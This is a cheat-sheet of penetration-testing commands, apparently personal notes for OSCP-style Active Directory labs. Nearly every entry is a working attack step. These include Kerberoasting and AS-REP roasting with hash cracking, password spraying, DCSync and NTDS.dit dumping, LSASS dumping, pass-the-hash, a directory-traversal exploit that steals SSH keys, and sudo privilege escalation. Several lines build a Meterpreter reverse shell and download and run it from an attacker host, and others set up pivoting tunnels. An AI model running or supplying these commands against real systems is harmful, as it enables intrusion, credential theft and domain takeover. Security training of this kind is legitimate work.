- cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\
lang: ps1
tags: oscp
desc: Listing contents of the "SYSVOL\policies share"
- cmd: cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
lang: ps1
tags: oscp
desc: Checking contents of oldpolicybackup.xml file
- cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
lang: ps1
tags: oscp
desc: Using gppdecrypt to decrypt the password
- cmd: ls \\FILES04\docps1are
lang: sh
tags: oscp
desc: Listing the contents of docsare
- cmd: ls \\FILES04\docps1are\docs\do-not-ps1are
lang: sh
tags: oscp
desc: Listing the contents of donotps1are
- cmd: cat \\FILES04\docps1are\docs\do-not-ps1are\start-email.txt
lang: sh
tags: oscp
desc: Checking the "startemail.txt" file
- cmd: Import-Module .\Sharphound.ps1
lang: ps1
tags: oscp
desc: Importing the SharpHound script to memory
- cmd: Get-Help Invoke-BloodHound
lang: ps1
tags: oscp
desc: Checking the SharpHound options
- cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"
lang: ps1
tags: oscp
desc: Running SharpHound to collect domain data
- cmd: ls C:\Users\stephanie\Desktop\
lang: sh
tags: oscp
desc: SharpHound generated files
- cmd: sudo neo4j start
lang: sh
tags: oscp
desc: Starting the Neo4j service in Kali Linux
- cmd: bloodhound
lang: sh
tags: oscp
desc: Starting BloodHound in Kali Linux
- cmd: xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75
lang: sh
tags: oscp
desc: Connecting to CLIENT75 via RDP
- cmd: dir \\web04.corp.com\backup
lang: ps1
tags: oscp
desc: Displaying contents of a SMB share
- cmd: impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
lang: ps1
tags: oscp
desc: Using GetNPUsers to perform ASREP roasting
- cmd: kerbrute userenum --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
lang: sh
tags: oscp
desc: enumerate users of AD using bruteforce userlist
- cmd: kerbrute passwordspray --dc 192.168.56.30 -d mini.lab users.txt phantom
lang: sh
tags: oscp
desc: perform a horizontal brute force attack against a list of domain users
- cmd: kerbrute bruteuser --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Passwords/500-worst-passwords.txt ben
lang: sh
tags: oscp
desc: traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy.
- cmd: cat combos.lst | kerbrute --dc 192.168.56.30 -d mini.lab bruteforce -
lang: sh
tags: oscp
desc: bruteforce with reads username and password combinations (in the format username:password)
- cmd: hashcat --help | grep -i "Kerberos"
lang: sh
tags: oscp
desc: Obtaining the correct mode for Hashcat
- cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the ASREP hash with Hashcat
- cmd: cd C:\Tools ; .\Rubeus.exe asreproast /nowrap
lang: ps1
tags: oscp
desc: Using Rubeus to obtain the ASREP hash of _dave_
- cmd: sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the modified ASREP hash
- cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
lang: ps1
tags: oscp
desc: Utilizing Rubeus to perform a Kerberoast attack
- cmd: cat hashes.kerberoast ; hashcat --help | grep -i "Kerberos"
lang: sh
tags: oscp
desc: Reviewing the correct Hashcat mode
- cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the TGSREP hash
- cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
lang: sh
tags: oscp
desc: Using impacketGetUserSPNs to perform Kerberoasting on Linux
- cmd: sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
lang: sh
tags: oscp
desc: Cracking the TGSREP hash
- cmd: whoami /user
lang: ps1
tags: oscp
desc: Obtaining the domain SID
- cmd: klist
lang: ps1
tags: oscp
desc: Inspecting the injected ticket in memory or listing Kerberos tickets to confirm the silver ticket is submitted to the current session
- cmd: iwr -UseDefaultCredentials http://web04
lang: ps1
tags: oscp
desc: Accessing the SMB share with the silver ticket
- cmd: impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
lang: sh
tags: oscp
desc: Using secretsdump to perform the dcsync attack to obtain the NTLM hash of _dave_
- cmd: impacket-secretsdump mini.lab/bob:"superman"@192.168.56.31
lang: sh
tags: oscp
desc: Using secretsdump to get the secrets of the owned machine
- cmd: wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
lang: ps1
tags: oscp
desc: Running the wmic utility to spawn a process on a remote system.
- cmd: $username = 'jen'; ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
lang: ps1
tags: oscp
desc: Executing the WMI PowerShell payload.
- cmd: python3 encode.py
lang: sh
tags: oscp
desc: Running the base64 encoder Python script
- cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; $Options = New-CimSessionOption -Protocol DCOM ; $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
lang: ps1
tags: oscp
desc: Executing the WMI payload with base64 reverse shell
- cmd: winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
lang: ps1
tags: oscp
desc: Executing commands remotely via WinRS
- cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; New-PSSession -ComputerName 192.168.50.73 -Credential $credential
lang: ps1
tags: oscp
desc: Establishing a PowerShell Remote Session via WinRM
- cmd: Enter-PSSession 1
lang: ps1
tags: oscp
desc: Inspecting the PowerShell Remoting session
- cmd: ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
lang: ps1
tags: oscp
desc: Obtaining an Interactive Shell on the Target System with PsExec
- cmd: /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
lang: sh
tags: oscp
desc: Passing the hash using Impacket wmiexec
- cmd: net use \\files04 ; klist
lang: ps1
tags: oscp
desc: Mapping a network share on a remote server and listing Kerberos tickets
- cmd: cd C:\tools\SysinternalsSuite\ ; .\PsExec.exe \\files04 cmd
lang: ps1
tags: oscp
desc: Opening remote connection using Kerberos
- cmd: whoami ; ls \\web04\backup
lang: ps1
tags: oscp
desc: Verifying that the user jen has no access to the shared folder
desc: Injecting the selected TGS into process memory.
- cmd: ls \\web04\backup
lang: ps1
tags: oscp
desc: Accessing the shared folder through the injected ticket
- cmd: tasklist | findstr "calc"
lang: ps1
tags: oscp
desc: Veriyfing that calculator is running on FILES04
- cmd: PsExec64.exe \\DC1 cmd.exe
lang: ps1
tags: oscp
desc: Failed attempt to perform lateral movement
- cmd: PsExec.exe \\dc1 cmd.exe
lang: ps1
tags: oscp
desc: Performing lateral movement and
- cmd: psexec.exe \\192.168.50.70 cmd.exe
lang: ps1
tags: oscp
desc: Use of NTLM authentication blocks our
- cmd: vshadow.exe -nw -p C:\
lang: ps1
tags: oscp
desc: Permorming a Shadow Copy of the entire C:\ drive
- cmd: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
lang: ps1
tags: oscp
desc: Copying the ntds database to the C:\ drive
- cmd: reg.exe save hklm\system c:\system.bak
lang: ps1
tags: oscp
desc: Copying the ntds database to the C:\ drive
- cmd: impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
lang: sh
tags: oscp
desc: Copying the ntds database to the C:\ drive
- cmd: mkdir beyond ; cd beyond ; mkdir mailsrv1 ; mkdir websrv1 ; touch creds.txt
lang: sh
tags: oscp
desc: Basic work environment for this penetration test
- cmd: gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
lang: sh
tags: oscp
desc: Using gobuster to identify pages and files on MAILSRV1
- cmd: whatweb http://192.168.50.244
lang: sh
tags: oscp
desc: WhatWeb scan of WEBSRV1
- cmd: wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
lang: sh
tags: oscp
desc: WPScan of the WordPress web page on WEBSRV1
- cmd: searchsploit duplicator
lang: sh
tags: oscp
desc: SearchSploit results for the Duplicator WordPress plugin
- cmd: searchsploit -x 50420
lang: sh
tags: oscp
desc: Searchsploit command to examine a specific exploit
- cmd: cd beyond/websrv1 ; searchsploit -m 50420
lang: sh
tags: oscp
desc: SearchSploit command to copy the exploit script to the current directory
- cmd: python3 50420.py http://192.168.50.244 /etc/passwd
lang: sh
tags: oscp
desc: Performing a Directory Traversal attack on WEBSRV1
- cmd: python3 50420.py http://192.168.50.244 /home/marcus/.ssh/id_rsa ; python3 50420.py http://192.168.50.244 /home/daniela/.ssh/id_rsa
lang: sh
tags: oscp
desc: Retrieving the SSH private key of daniela
- cmd: ssh2john id_rsa > ssh.hash ; john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
lang: sh
tags: oscp
desc: Cracking the passphrase of the SSH private key
- cmd: ssh -i id_rsa daniela@192.168.50.244
lang: sh
tags: oscp
desc: Accessing WEBSRV1 via SSH
- cmd: sudo git -p help config
lang: sh
tags: oscp
desc: Abusing git sudo command by launching pager in a privileged context
- cmd: cd /srv/www/wordpress/ ; git status ; git log
lang: sh
tags: oscp
desc: Examining the Git repository
- cmd: git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
lang: sh
tags: oscp
desc: Displaying the differences between the two commits
- cmd: cat creds.txt
lang: sh
tags: oscp
desc: Displaying contents of creds.txt
- cmd: cat usernames.txt ; cat passwords.txt
lang: sh
tags: oscp
desc: Displaying the created lists containing the identified usernames and passwords
- cmd: crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success
lang: sh
tags: oscp
desc: Checking for valid credentials with CrackMapExec
- cmd: crackmapexec smb 192.168.56.30 -u users.txt -p users.txt --no-bruteforce
lang: sh
tags: oscp
desc: Try the classic user=password test
- cmd: sprayhound -lu bob -lp superman -U users.txt -d mini.lab -dc 192.168.56.30 --lower -t 2
lang: sh
tags: oscp
desc: try sprayhound with a valid user to avoid locking account (option -t to set the number of try left)
- cmd: crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
lang: sh
tags: oscp
desc: Listing SMB shares on MAILSRV1 with CrackMapExec
- cmd: crackmapexec smb 192.168.56.30 -u bob -p 'superman' -d mini.lab --users
lang: sh
tags: oscp
desc: see the status of bruteforce
- cmd: netexec smb 192.168.56.30 -u guest -p '' --rid-brute
lang: sh
tags: oscp
desc: netexec to enumerate user account names on the host with a RID cycle attack
- cmd: netexec smb 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt --continue-on-success
lang: sh
tags: oscp
desc: netexec to password spray SMB
- cmd: netexec rdp 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt
lang: sh
tags: oscp
desc: netexec to password spray RDP
- cmd: netexec winrm 192.168.56.31 -u bob -p /usr/share/seclists/Passwords/500-worst-passwords.txt
lang: sh
tags: oscp
desc: netexec to password spray WINRM
- cmd: lsassy -d mini.lab -u bob -p superman -m dumpertdll -O dumpertdll_path=~/hs/ressources/Outflank-Dumpert-DLL.dll 192.168.56.31
lang: sh
tags: oscp
desc: Dumping LSASS
- cmd: impacket-GetADUsers -dc-ip 192.168.56.30 -all mini.lab/bob:superman
lang: sh
tags: oscp
desc: List all users on AD using an account
- cmd: ldapsearch -H ldap://192.168.56.30 -D "bob@mini.lab" -w superman -b 'DC=mini,DC=lab' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'
lang: sh
tags: oscp
desc: List all users on AD using an account and ldap
- cmd: mkdir /home/kali/beyond/webdav ; /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
lang: sh
tags: oscp
desc: Starting WsgiDAV on port 80
- cmd: swaks --server 10.10.87.13 --auth-user f.miller@skylark.com --auth-pass w35oyfm9C95cXEm21GYY -q AUTH
lang: sh
tags: oscp
desc: Check a smtp account
- cmd: whoami ; hostname ; ipconfig
lang: sh
tags: oscp
desc: Obtaining basic information about the target machine
- cmd: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe
lang: sh
tags: oscp
desc: Creating a Meterpreter reverse shell executable file
- cmd: sudo msfconsole -q ; use multi/handler ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST 192.168.119.5 ; set LPORT 443 ; set ExitOnSession false ; run -j
lang: sh
tags: oscp
desc: Starting Metasploit listener on port 443
- cmd: iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe
lang: sh
tags: oscp
desc: Downloading and executing Meterpreter reverse shell
- cmd: use multi/manage/autoroute ; set session 1 ; run ; use auxiliary/server/socks_proxy ; set SRVHOST 127.0.0.1 ; set VERSION 5 ; run -j
lang: sh
tags: oscp
desc: Creating a SOCKS5 proxy to access the internal network from our Kali machine
- cmd: cat /etc/proxychains4.conf
lang: sh
tags: oscp
desc: proxychains configuration file settings
- cmd: proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
lang: sh
tags: oscp
desc: Enumerating SMB with CrackMapExec and proxychains
- cmd: ~/hs/tools/chisel server -p 8080 --reverse
lang: sh
tags: oscp
desc: Setting up Chisel on Kali to access the Web Server on INTERNALSRV1 via Browser
- cmd: sessions -i 1 ; upload chisel.exe C:\\Users\\marcus\\chisel.exe
lang: sh
tags: oscp
desc: Uploading Chisel to CLIENTWK1 via our Meterpreter session
- cmd: chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80
lang: sh
tags: oscp
desc: Utilizing Chisel to set up a reverse port forwarding to port 80 on INTERNALSRV1
- cmd: proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john
lang: sh
tags: oscp
desc: Kerberoasting the daniela user account
- cmd: sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force
lang: sh
tags: oscp
desc: Cracking the TGSREP hash
- cmd: cd C:\Users\Administrator ; iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe
lang: sh
tags: oscp
desc: Downloading and executing the Meterpreter reverse shell
- cmd: iwr -uri http://192.168.119.5:8000/mimikatz.exe -Outfile mimikatz.exe ; .\mimikatz.exe
lang: ps1
tags: oscp
desc: Downloading and launching the newest version of Mimikatz from our Kali machine
- cmd: proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240
lang: sh
tags: oscp
desc: Using psexec to get an interactive shell
- cmd: ~/hs/tools/reverse-sshx64 -l -v
lang: sh
tags: oscp
desc: Listen and bind reversessh
- cmd: issh -i ~/hs/ressources/rssh/id_reverse-ssh localhost -p1234
lang: sh
tags: oscp
desc: connect back using reverse-ssh
- cmd: iscp -i ~/hs/ressources/rssh/id_reverse-ssh -P40633 localhost:/C:/Users/Administrator/20231208013035_BloodHound.zip ./
lang: sh
tags: oscp
desc: using file transfert with reverse-ssh (windows target)
- cmd: frpc tcp -r 6001 -i 127.0.0.1 -l 7001 -n tunnel-name
lang: sh
tags: COMMON
desc: fast reverse tunnel 127.0.0.1:7001 to gb.hackade.org:6001 (need ghostunnel and chisel)
- cmd: tail --pid=$(pgrep procname) -f /dev/null && ntf send finished
lang: sh
tags: COMMON
desc: wait and send message when a process is fish
- cmd: python3 -mvenv ~/.virtualenvs/wsgidav
lang: sh
tags: COMMON
desc: create a new python virtualenvs
- cmd: source ~/.virtualenvs/wsgidav/bin/activate
lang: sh
tags: COMMON
desc: use a python venv
- cmd: python3 -mvenv ~/.virtualenvs/reindent ; source ~/.virtualenvs/wsgidav/bin/reindent; reindent
lang: sh
tags: COMMON
desc: install and use reindent for Python
- cmd: cat ips | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | sponge ips
lang: sh
tags: COMMON
desc: extract ips from file
- cmd: paste -d ' ' old_ips ips | xargs -I{} bash -c "mv {}"
lang: sh
tags: COMMON
desc: batch rename directory
- cmd: ping -M do -s <mtu-value> 192.168.1.1
lang: sh
tags: COMMON
desc: check for the correct MTU value
- cmd: ip link set dev tun0 mtu 1250
lang: sh
tags: COMMON
desc: change the mtu value for an interface
- cmd: sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up
lang: sh
tags: oscp
desc: Setup Ligolo-ng proxy
- cmd: ~/hs/tools/ligolo-ng-proxy -selfcert
lang: sh
tags: oscp
desc: Launch Ligolo-ng proxy using self-signed certs
- cmd: ~/hs/tools/ligolo-ng-proxy -selfcert -laddr 0.0.0.0:7777
lang: sh
tags: oscp
desc: Launch Ligolo-ng proxy using self-signed certs and custom port
- cmd: sudo ip route add 192.168.0.0/24 dev ligolo
lang: sh
tags: oscp
desc: Add a route on the proxy/relay server to the 192.168.0.0/24 agent network
- cmd: ligolo-ng-agent -ignore-cert -connect 192.168.45.157:11601
lang: sh
tags: oscp
desc: connect ligolo-ng agent
- cmd: ligolo-ng » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
lang: sh
tags: oscp
desc: create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
- cmd: ligolo-ng » session
lang: sh
tags: oscp
desc: select a target
- cmd: ligolo-ng » ifconfig
lang: sh
tags: oscp
desc: Display the network configuration of the agent
- cmd: ligolo-ng » start_tunnel
lang: sh
tags: oscp
desc: Start the tunnel on the proxy
- cmd: ligolo-ng » listener_list
lang: sh
tags: oscp
desc: view currently running listeners
- cmd: sudo ip route add 240.0.0.1/32 dev ligolo; nmap 240.0.0.1 -sV
lang: sh
tags: oscp
desc: Access to agent's local ports (127.0.0.1)
- cmd: ~/hs/tools/servedir.py ~/hs/ressources
lang: sh
tags: oscp
desc: launch local webserver to serve ressources files
- cmd: sudo ~/hs/tools/servedir.py ~/hs/ressources 80
lang: sh
tags: oscp
desc: launch local webserver to serve ressources files on port 80
- cmd: powershell Get-ChildItem -Path C:\users -Include *.txt -File -Recurse -ErrorAction SilentlyContinue
lang: ps1
tags: oscp
desc: search all txt files in users home
- cmd: impacket-psexec 'Administrator:password@172.16.138.10'
lang: sh
tags: oscp
desc: psexec using a local login/password
- cmd: sudo lsof -nP -i tcp
lang: sh
tags: COMMON
desc: list process listing tcp socket
- cmd: sudo lsof -u 1000
lang: sh
tags: COMMON
desc: list files used by UID 1000
- cmd: sudo lsof -p 2658
lang: sh
tags: COMMON
desc: list files used by PID 2658